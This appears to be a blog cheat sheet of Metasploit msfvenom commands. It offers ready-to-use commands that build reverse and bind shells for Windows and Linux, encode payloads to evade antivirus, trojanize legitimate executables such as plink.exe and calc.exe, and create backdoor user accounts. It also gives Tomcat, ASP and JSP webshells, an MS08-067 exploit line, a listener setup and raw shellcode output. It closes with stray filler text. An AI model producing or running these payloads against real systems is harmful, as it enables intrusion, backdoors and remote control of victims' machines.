General commands with Msfvenom
List all payloads types (around 562 types):
msfvenom -l payloadsShow only Windows x64 payloads:
msfvenom -l payloads --platform windows --arch x64Shows output formats (asp, exe, php, powershell, js_le, csharp, …):
msfvenom --list formats
Difference between staged and non-staged payloads
In msfvenom we can choose between staged and non-staged payloads, but what are they?
Non-staged payloads are standalone payloads, that means the whole payload is sent at once to the target. Advantage: Less communications so it is better to avoid detection.
Staged payloads are sent in two stages: The first one it loads a dropper, and the second stage it loads the payload. The advantages are: 1) If the buffer overflow it’s too small to hold a non-staged payload, split it in two will help. 2) Having several parts it is also better for host anti-virus detection.
Payloads generation with Msfvenom
Windows binary payloads
Generate C code for a Windows target with a TCP reverse shell connecting back to host $LOCALIP:443 (non-staged payload):
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f cGenerate C code for a Windows target with a TCP reverse shell connecting back to host $LOCALIP:443 (staged payload):
msfvenom -p windows/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -f cGenerate C code for TCP reverse shell to host $LOCALIP:443 obfuscating the payload and avoiding bad chars \x00\x0a\x0d in the shellcode:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"Generate C code for reverse shell to host $LOCALIP:443 (TCP) obfuscating the payload and avoiding bad chars \x00\x0a\x0d in the shellcode and spawning the shellcode in a different threat to not crash the main process:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"Generate JavaScript payload to execute a staged reverse shell against host $LOCALIP on port 443:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f js_le -e generic/noneGenerate a Windows EXE with a shellcode executing a reverse shell against host $LOCALIP on port 4444 (TCP). The output will be written in file shell_reverse.exe:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exeGenerate a Windows EXE with a shellcode executing a reverse shell against host $LOCALIP on port 4444 (TCP). The output will be written in file shell_reverse_msf_encoded.exe. Obfuscate the shellcode doing 9 rounds of obfuscation.
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exeTrojanize file plink.exe to execute a reverse shell against host $LOCALIP:4444 (TCP) using 9 rounds of obfuscation and write the output EXE in file shell_reverse_msf_encoded_embedded.exe:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exeGenerate an EXE file called met_https_reverse.exe to execute a reverse shell through https (port 443) on host $LOCALIP to connect to a listening meterpreter session:
msfvenom -p windows/meterpreter/reverse_https LHOST=$LOCALIP LPORT=443 -f exe -o met_https_reverse.exemsfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exemsfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exemsfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exemsfvenom -p windows/meterpreter/reverse_http LHOST=$LOCALIP LPORT=80 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/plink.exe -o /var/www/daaa118.exeTrojanize calc.exe to execute a meterpreter reverse shell against host $LOCALIP saved in file calc_2.exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP -f exe -k -x calc.exe -o calc_2.exeGenerate file meterpreter.exe cointaining a reverse shell against host $LOCALIP on port TCP/443:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exeWarning: When using -x parameter, the executable must not be UPX compressed
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -x /usr/share/windows-binaries/plink.exe -e x86/shikata_ga_nai -o plink-meterpreter.exeExploit MS08–067 (NetAPI vulnerability) on host $IP and execute a bindshell after exploitation:
msfcli windows/smb/ms08_067_netapi RHOST=$IP PAYLOAD=windows/shell/bind_tcp EGenerate a python payload to execute calc.exe omitting characters \x00 (NULL byte):
msfvenom -p windows/exec CMD=calc.exe -b "x00" -f pyCreate account.exe file 20 rounds of obfuscation that contains a payload that will create the user hack3r with password s3cret^s3cret:
msfvenom -p windows/adduser -f exe -o account.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20Trojanized DLL calc.dll to execute calc.exe:
msfvenom -p windows/exec CMD=calc.exe -f dll -o calc.dllTrojanize Windows Service with 20 rounds of obfuscation to create a new user hack3r with password s3cret^s3cret:
msfvenom -p windows/exec CMD=calc.exe -f exe-service
msfvenom -p windows/adduser -f exe-service -o service.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20Linux binary payloads
Generate C code for a bindshell for a Linux target on port TCP/4444 avoiding bad chars \x00\x0a\0d\x20 and obfuscating the shellcode:
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" –e x86/shikata_ga_naiStaged ELF shared library (.so) payload with a reverse shell:
msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o staged.out -f elf-soNon-staged ELF shared library (.so) payload with a reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -o non-staged.out -f elf-soGet shellcode assembler code:
msfvenom -p linux/x86/exec cmd=whoami R | ndisasm -u -Payload size: 42 bytes00000000 6A0B push byte +0xb
00000002 58 pop eax
00000003 99 cdq
00000004 52 push edx
00000005 66682D63 push word 0x632d
00000009 89E7 mov edi,esp
0000000B 682F736800 push dword 0x68732f
00000010 682F62696E push dword 0x6e69622f
00000015 89E3 mov ebx,esp
00000017 52 push edx
00000018 E807000000 call 0x24
0000001D 7768 ja 0x87
0000001F 6F outsd
00000020 61 popa
00000021 6D insd
00000022 6900575389E1 imul eax,[eax],dword 0xe1895357
00000028 CD80 int 0x80Get assembler in friendly format to embedded in a python/perl exploit:
msfvenom -p linux/x86/exec cmd=whoami R | hexdump -v -e '"\\\x" 1/1 "%02x"'Payload size: 42 bytes\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7
\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89
\xe3\x52\xe8\x07\x00\x00\x00\x77\x68\x6f\x61
\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80Webshells generation with Msfvenom
Tomcat webshell with a meterpreter reverse shell:
msfvenom -p java/meterpreter/reverse_tcp -f war -o tomcatapp.war LHOST=$LOCALIPTomcat webshell with a standalone reverse shell against host $LOCALIP on port 442:
msfvenom -p java/shell_reverse_tcp -f war -o tomcatapp2.war LHOST=$LOCALIP LPORT=442ASP webshell on Windows:
msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f asp -o webshell_reverse_msfvenom.txtJSP webshell on Linux:
msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o test.jsp -f jsp-v payload: specifies the payload name!! Very useful when replacing existing payloads in existent exploits
Using Metasploit and wait for a reverse shell
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 443
set LHOST $LOCALIP
exploit
This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.
ConversionConversion EmoticonEmoticon